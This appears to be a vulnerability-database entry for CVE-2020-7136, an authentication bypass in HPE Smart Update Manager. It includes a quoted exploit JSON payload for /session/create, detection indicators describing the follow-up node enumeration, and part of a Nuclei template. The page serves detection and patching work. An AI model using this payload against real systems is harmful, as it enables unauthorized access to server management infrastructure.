CVE-2020-7136
published 2020-04-30CVE-2020-7136: A security vulnerability in HPE Smart Update Manager (SUM) prior to version 8.5.6 could allow remote unauthorized access. Hewlett Packard Enterprise has…
PriorityP190critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
79.52%
99.6th percentile
A security vulnerability in HPE Smart Update Manager (SUM) prior to version 8.5.6 could allow remote unauthorized access. Hewlett Packard Enterprise has provided a software update to resolve this vulnerability in HPE Smart Update Manager (SUM) prior to 8.5.6. Please visit the HPE Support Center at https://support.hpe.com/hpesc/public/home to download the latest version of HPE Smart Update Manager (SUM). Download the latest version of HPE Smart Update Manager (SUM) or download the latest Service Pack For ProLiant (SPP).
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| hewlett_packard_enterprise | smart_update_manager | — | — |
| hpe | smart_update_manager | < 8.5.6 | 8.5.6 |
Detection & IOCsextracted from sources · hover to see the quote
command{"hapi":{"username":"Administrator","password":"any_password","language":"en","mode":"gui", "usesshkey":true, "privatekey":"any_privateky", "passphrase":"any_passphase","settings":{"output_filter":"passed","port_number":"444"}}}↗
- →Detect exploitation attempts by monitoring POST requests to /session/create with a JSON body containing 'usesshkey':true — this is the auth-bypass trigger using an SSH key flag to skip password validation. ↗
- →A successful exploit response will contain all three strings in the body: 'hmessage', 'Command completed successfully.', and 'node_name' — match all three (AND condition) to confirm exploitation. ↗
- →After session creation, attackers will follow up with GET /session/<sessionid>/node/index to enumerate nodes — monitor for this pattern with a valid sessionId extracted from a prior /session/create response. ↗
- →The sessionId format used in follow-on requests matches the regex pattern '[a-z0-9.]+' — use this to identify active sessions created via the bypass. ↗
- →Content-Type header is application/json on the exploit POST — combine with the /session/create path and usesshkey field in the body for a high-fidelity detection rule. ↗
- ·The exploit payload uses 'usesshkey':true with arbitrary/dummy values for privatekey and passphrase, indicating the vulnerability is an authentication bypass (CWE-288) that does not actually validate SSH key material — any value triggers the bypass. ↗
- ·The vulnerability affects HPE Smart Update Manager (SUM) versions strictly prior to 8.5.6; version 8.5.6 and later are not affected. ↗
- ·The exploit targets port 444 as specified in the settings payload — HPE SUM may be running on a non-standard HTTPS port; ensure network monitoring covers port 444. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-jp2q-w73p-9cf9: A security vulnerability in HPE Smart Update Manager (SUM) prior to version 8
ghsa_unreviewed·2022-05-24
CVE-2020-7136 [HIGH] GHSA-jp2q-w73p-9cf9: A security vulnerability in HPE Smart Update Manager (SUM) prior to version 8
A security vulnerability in HPE Smart Update Manager (SUM) prior to version 8.5.6 could allow remote unauthorized access. Hewlett Packard Enterprise has provided a software update to resolve this vulnerability in HPE Smart Update Manager (SUM) prior to 8.5.6. Please visit the HPE Support Center at https://support.hpe.com/hpesc/public/home to download the latest version of HPE Smart Update Manager (SUM). Download the latest version of HPE Smart Update Manager (SUM) or download the latest Service Pack For ProLiant (SPP).
VulnCheck
HPE Smart Update Manager (SUM) Remote Unauthorized Access Vulnerability
vulncheck·2020·CVSS 9.8
CVE-2020-7136 [CRITICAL] HPE Smart Update Manager (SUM) Remote Unauthorized Access Vulnerability
HPE Smart Update Manager (SUM) Remote Unauthorized Access Vulnerability
A security vulnerability in HPE Smart Update Manager (SUM) prior to version 8.5.6 could allow remote unauthorized access. Hewlett Packard Enterprise has provided a software update to resolve this vulnerability in HPE Smart Update Manager (SUM) prior to 8.5.6. Please visit the HPE Support Center at https://support.hpe.com/hpesc/public/home to download the latest version of HPE Smart Update Manager (SUM). Download the latest version of HPE Smart Update Manager (SUM) or download the latest Service Pack For ProLiant (SPP).
Affected: hpe smart_update_manager
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploita
No detection rules found.
Nuclei
HPE Smart Update Manager < 8.5.6 - Remote Unauthorized Access
nuclei·CVSS 9.8
CVE-2020-7136 [CRITICAL] HPE Smart Update Manager < 8.5.6 - Remote Unauthorized Access
HPE Smart Update Manager < 8.5.6 - Remote Unauthorized Access
HPE Smart Update Manager (SUM) prior to version 8.5.6 could allow remote unauthorized access.
Template:
id: CVE-2020-7136
info:
name: HPE Smart Update Manager < 8.5.6 - Remote Unauthorized Access
author: gy741
severity: critical
description: HPE Smart Update Manager (SUM) prior to version 8.5.6 could allow remote unauthorized access.
impact: |
An attacker can gain unauthorized access to the HPE Smart Update Manager, potentially leading to further compromise of the system.
remediation: Hewlett Packard Enterprise has provided a software update to resolve this vulnerability in HPE Smart Update Manager (SUM) prior to 8.5.6. Please visit the HPE Support Center at https://support.hpe.com/hpesc/public/home to download the latest ve
No writeups or analysis indexed.
2020-04-30
Published
Exploited in the wild